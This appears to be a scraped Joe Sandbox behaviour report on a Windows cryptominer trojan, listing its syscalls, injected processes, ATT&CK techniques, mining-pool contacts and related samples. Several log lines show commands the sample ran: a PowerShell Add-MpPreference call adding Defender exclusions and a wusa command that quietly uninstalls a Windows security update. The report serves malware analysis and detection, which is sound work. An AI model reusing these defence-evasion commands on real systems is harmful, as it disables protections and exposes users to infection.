        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72878D6F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72878D6F0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72878D894 SetUnhandledExceptionFilter,0_2_00007FF72878D894
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B55D894 SetUnhandledExceptionFilter,18_2_00007FF63B55D894
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeCode function: 18_2_00007FF63B55D6F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF63B55D6F0
        Source: C:\Windows\System32\conhost.exeCode function: 23_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,23_2_0000000140001160
        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DA11Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x7FF728771317Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DAFFJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtReadVirtualMemory: Direct from: 0x7FF63B542BC8Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DA51Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x7FF728772E1CJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DD06Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtQuerySystemInformation: Direct from: 0x1BB8028A570Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtCreateThreadEx: Direct from: 0x7FF728772EBEJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DB8FJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtAllocateVirtualMemory: Direct from: 0x7FF63B5438D8Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DAC2Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtWriteVirtualMemory: Direct from: 0x7FF63B542E46Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x1BB8028BC38Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtDeviceIoControlFile: Direct from: 0x7FFDB4404B5EJump to behavior
        Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x7FF728772B86Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DC18Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DCC9Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DC58Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtQuerySystemInformation: Direct from: 0x1BB809813FDJump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DAFFJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DA11Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DC58Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtAllocateVirtualMemory: Direct from: 0x7FF63B541317Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtAllocateVirtualMemory: Direct from: 0x7FF63B542E1CJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DC18Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtAllocateVirtualMemory: Direct from: 0x122A433BC38Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtAllocateVirtualMemory: Direct from: 0x7FF63B542B86Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtQuerySystemInformation: Direct from: 0x122A433A570Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DAC2Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DB8FJump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x7FF728772E73Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DD06Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x1BB809878ECJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtQuerySystemInformation: Direct from: 0x122A492134BJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtAllocateVirtualMemory: Direct from: 0x122A433A43BJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x7FF63B542E73Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028DCC9Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtQuerySystemInformation: Direct from: 0x1BB8098134BJump to behavior
        Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x7FF7287738D8Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtWriteVirtualMemory: Direct from: 0x7FF728772E46Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x7FFDB43E26A1Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtCreateThreadEx: Direct from: 0x7FF63B542EBEJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtAllocateVirtualMemory: Direct from: 0x122A49278ECJump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x7FF728772BFAJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433DA51Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtReadVirtualMemory: Direct from: 0x7FF728772BC8Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x1BB8028D988Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x7FF63B542BFAJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtQuerySystemInformation: Direct from: 0x122A49213FDJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeNtProtectVirtualMemory: Direct from: 0x122A433D988Jump to behavior
        Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x1BB8028A43BJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeThread register set: target process: 504Jump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeThread register set: target process: 2120Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\notepad.exe notepad.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\notepad.exe notepad.exeJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
        Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exeProcess created: C:\Windows\System32\conhost.exe conhost.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72878D5CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF72878D5CC
        Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Windows Management Instrumentation
        11
        Windows Service
        11
        Windows Service
        1
        Masquerading
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        111
        Process Injection
        11
        Disable or Modify Tools
        LSASS Memory241
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution
        Logon Script (Windows)1
        Abuse Elevation Control Mechanism
        31
        Virtualization/Sandbox Evasion
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Native API
        Login Hook1
        DLL Side-Loading
        111
        Process Injection
        NTDS31
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput Capture1
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets1
        Application Window Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism
        Cached Domain Credentials13
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        File Deletion
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1458484 Sample: file.exe Startdate: 17/06/2024 Architecture: WINDOWS Score: 100 54 pool.hashvault.pro 2->54 58 Snort IDS alert for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 7 other signatures 2->64 8 nlkuzmdacjrb.exe 1 2->8         started        12 file.exe 1 3 2->12         started        signatures3 process4 file5 50 C:\Windows\Temp\gtebvdararzg.sys, PE32+ 8->50 dropped 66 Multi AV Scanner detection for dropped file 8->66 68 Machine Learning detection for dropped file 8->68 70 Modifies the context of a thread in another process (thread injection) 8->70 72 Sample is not signed and drops a device driver 8->72 14 conhost.exe 8->14         started        18 powershell.exe 8->18         started        20 cmd.exe 8->20         started        28 2 other processes 8->28 52 C:\ProgramData\...\nlkuzmdacjrb.exe, PE32+ 12->52 dropped 74 Adds a directory exclusion to Windows Defender 12->74 76 Found direct / indirect Syscall (likely to bypass EDR) 12->76 22 powershell.exe 23 12->22         started        24 cmd.exe 1 12->24         started        26 sc.exe 1 12->26         started        30 5 other processes 12->30 signatures6 process7 dnsIp8 56 pool.hashvault.pro 45.76.89.70, 3333, 49717 AS-CHOOPAUS United States 14->56 78 Found strings related to Crypto-Mining 14->78 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->80 32 conhost.exe 18->32         started        48 2 other processes 20->48 82 Loading BitLocker PowerShell Module 22->82 34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        38 wusa.exe 24->38         started        40 conhost.exe 26->40         started        42 conhost.exe 30->42         started        44 conhost.exe 30->44         started        46 conhost.exe 30->46         started        signatures9 84 Detected Stratum mining protocol 56->84 process10

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        file.exe45%ReversingLabsWin64.Trojan.InjectorX
        file.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe100%Joe Sandbox ML
        C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe45%ReversingLabsWin64.Trojan.InjectorX
        C:\Windows\Temp\gtebvdararzg.sys5%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
        https://172.94.1q0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        199.232.210.172
        truefalse
          unknown
          pool.hashvault.pro
          45.76.89.70
          truetrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://172.94.1qconhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://xmrig.com/docs/algorithmsconhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            45.76.89.70
            pool.hashvault.proUnited States
            20473AS-CHOOPAUStrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1458484
            Start date and time:2024-06-17 18:14:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 59s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:29
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal100.evad.mine.winEXE@38/12@1/1
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target conhost.exe, PID 2120 because there are no executed function
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • VT rate limit hit for: file.exe
            TimeTypeDescription
            12:15:05API Interceptor1x Sleep call for process: file.exe modified
            12:15:07API Interceptor28x Sleep call for process: powershell.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            45.76.89.70has.exeGet hashmaliciousXmrigBrowse
              file.exeGet hashmaliciousXmrigBrowse
                8R83Xif7hH.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                  dsf.exeGet hashmaliciousXmrigBrowse
                    633.exeGet hashmaliciousXmrigBrowse
                      setup.EXE.exeGet hashmaliciousXmrigBrowse
                        file.exeGet hashmaliciousXmrigBrowse
                          setup.exeGet hashmaliciousXmrigBrowse
                            setup.exeGet hashmaliciousXmrigBrowse
                              KfG6A72lQ1.exeGet hashmaliciousXmrigBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                pool.hashvault.prohttps://oxy.st/d/SmUhGet hashmaliciousXmrigBrowse
                                • 45.76.89.70
                                has.exeGet hashmaliciousXmrigBrowse
                                • 95.179.241.203
                                zTMEFv0Dh3.exeGet hashmaliciousXmrigBrowse
                                • 142.202.242.45
                                SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                • 95.179.241.203
                                file.exeGet hashmaliciousXmrigBrowse
                                • 95.179.241.203
                                file.exeGet hashmaliciousUnknownBrowse
                                • 45.76.89.70
                                6Yl34Sv8ZJ.exeGet hashmaliciousXmrigBrowse
                                • 45.76.89.70
                                file.exeGet hashmaliciousXmrigBrowse
                                • 142.202.242.43
                                http://5.42.66.10/download/123p.exeGet hashmaliciousXmrigBrowse
                                • 142.202.242.43
                                file.exeGet hashmaliciousXmrigBrowse
